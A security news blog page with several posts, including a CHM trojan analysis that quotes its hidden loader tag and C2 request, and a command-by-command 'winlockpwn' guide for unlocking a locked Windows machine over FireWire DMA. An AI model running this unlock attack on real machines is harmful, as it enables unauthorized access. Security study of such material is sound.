Free Honeypot Client Could Sting Malware

The Honeynet Project has released a new freebie honeypot client tool that lets security pros and researchers automatically detect and dissect bot infections and other malware attacks on client machines.

Capture-HPC v2.1 is an updated and enhanced version of the Honeynet Project’s high-interaction Capture-HPC client honeypot, which the organization last year used to study over 300,000 URLs from around 150,000 hosts for malicious intent. But this new client honeypot is 500 percent faster, and collects network traffic for all client-server interactions. 

The new client has many potential uses. It can be deployed as an intrusion detection sensor on a Website or as a pure honeypot to capture and vet all URLs that arrive via email, for instance.

“A Website operator could use it to crawl his own Website as an intrusion detection sensor. If he detects a client-side attack from his own Website using Capture, he can conclude that his site was compromised and is now serving malware code,” says Christian Seifert, a researcher from Victoria University in New Zealand, a member of Honeynet Project, and a co-developer of the tool. “An administrator could pipe all URLs received on their email system to a capture system.”

Read the rest of this story…

Posted in Internet, Networking, Privacy, Security | No Comments

Guarding the guardians: A story of PGP key ring theft

A couple of weeks ago, we received a CHM, or Windows Help file, embedded in e-mail as part of a targeted attack campaign against an NGO. Virus detection was near zero. On Virustotal.com, two solutions actually flagged it as malicious.

After decompiling the CHM file, which you can easily do using tools such as arCHMage or chmdecompiler, I spotted the following code in the HTML content, in addition to an executable ‘music.exe’:

object width=”0″ height=”0″ style=”display:none;”
type=”application/x-oleobject” codebase=”music.exe”

The goal of this code is to load a hidden object from the CHM container. This embedded file also was not recognized by the vast majority of anti virus vendors. The code connected to a ‘fake’ web server at a Hong Kong ISP, and issued the following request:

GET /scripts/msadce.exe/?UID=DD01x51 HTTP/1.0

When you see something like this, it raises suspicion that the UID is in fact a ‘command’ to a control server. In reality, the web server turned out not a web server at all. Any query but the above was answered with an immediate disconnect. In response to the above request, the server responded with a large BASE64 encoded response, which turned out to be an additional executable file. The trojan then executed this file, being its second stage payload.

Read the rest of this story…

Posted in Coding, Internet, Privacy, Security | No Comments

Opera now passes the ACID3 test

I have a quick update on where we are with Acid3.  Since the test was officially announced recently, our Core developers have been hard at work fixing bugs and adding the missing standards support.  Today we reached a 100% pass rate for the first time! There are some remaining issues yet to be fixed, but we hope to have those sorted out shortly.

We will release a technical preview version on labs.opera.com within the next week or so. For now, the screenshot above shows the Acid3 test as rendered in our latest WinGogi Desktop build. WinGogi is the Windows version of our reference builds used for the internal testing of Opera’s platform independent Core.

Source: Opera

Posted in Coding, Internet, Windows | No Comments

Researchers Discover Rootkit Variation

While there might not be new malicious threats under the sun, there are plenty of new ways to spin old virus attacks. Trend Micro researchers discovered last weekend a new variation of a MBR rootkit released in the wild, which contains new technology to prevent detection. When combined with Web threats, the new rootkit is proving to be both a destructive and prolific combination, security experts say.The rootkit models a similar virus from several years ago but with one added twist — the ability to circumvent a lot of anti-rootkit software and remain undetected.

“It’s a spin on an old attack,” said Jamz Yaneza, research project manager for Trend Micro. “This is typical of virus writers and mothership authors trying to find ways and means to make it more difficult.”

The malware then sits on the infected computer unbeknownst to the user, allowing attackers to infiltrate a system in order to steal passwords, financial information and other personal data.

Read the rest of this story…

Posted in Internet, Privacy, Security | No Comments

How To: winlockpwn

winlockpwn is a memory analysis tool released by Adam Boileau of storm.net.nz. This utility exploits firewire’s direct memory access. The operating system allows firewire devices to directly read/write memory without having to go through the processor. Sounds handy right? I installed winlockpwn on Ubuntu 7.10 and a fully patched Windows XP SP2 box. The first step is to download the required libraries:

sudo aptitude install libdc1394-13 libraw1394-dev swig python

Now we need to download and install Python 2.3 because I tried to run it using Python 2.5 with no success:

wget http://www.python.org/ftp/python/2.3.6/Python-2.3.6.tgz

tar -zxvf Python-2.3.6.tgz

cd Python-2.3.6

./configure

make

sudo make install

The next step is to modify libraw1394:

sudo vim /usr/include/libraw1394/raw1394.h

At this point go ahead and search for “__attribute__((deprecated));” in the file raw1394.h and comment out every line that contains it. Hint: don’t forget to end the line above it with a semi-colon. Once you comment all of them out, save and close the file. The next step is to get the pythonraw1394 library. It contains the python bindings for libraw1394, romtool, and businfo from Adam’s site.

wget http://www.storm.net.nz/static/files/pythonraw1394-1.0.tar.gz

And of course, we need to untar it

tar -zxvf pythonraw1394-1.0.tar.gz

Now we need to go into the untared directory and download the actual winlockpwn script:

cd pythonraw1394

wget http://www.storm.net.nz/static/files/winlockpwn

The winlockpwn script needs to be in the pythonraw1394 directory or it wont work without modifying the code. Also, we need to make it executable:

chmod +x winlockpwn

Now we also need to edit the Makefile for pythonraw1394 to point it to python 2.3’s include directory:

sudo vim Makefile

Now change /usr/include/python2.3 to /usr/local/include/python2.3 on lines 5 and 6. Again, save and quit and compile it with the following command:

sudo make

The raw1394 module also needs to also be loaded and the permissions changed on the raw1394 devices:

sudo modprobe raw1394

sudo chmod 666 /dev/raw1394

Now we need to plug into the windows machine and then edit the romtool to reflect the location of python:

sudo vim romtool

Change #!/usr/bin/python to #!/usr/local/bin/python on the first line one of the file.
Repeat the same step for the winlockpwn script as well.
And then load the ipod image onto the firewire port.

./romtool -s 0 ipod.csr

Loading the ipod image onto the firewire port basically fools windows into thinking your linux box is an ipod.
Now we can run businfo to make sure the ipod image is loaded and on what port number it is on as well as making sure you can see your computer on the other end. Mine showed the ipod image loaded onto port number 0 and my windows box on node number 1.
Now, the fun part! Run winlockpwn
as follows:

winlockpwn port node target

Mine looked like this:

./winlockpwn 0 1 1

Once you run winlockpwn, the windows box will accept any password you choose to give it (even a blank password) and unlock the system for you.

There are many security issues that arise from winlockpwn. What is to stop one of the janitorial staff from getting into the CEO’s office after hours and immediately getting access to his box because all he did was lock it before he went home? It just goes to show that once someone gains physical access, game over.

Source: PaulDotCom Community Blog

Posted in Internet, Linux, Privacy, Security, Windows | 2 Comments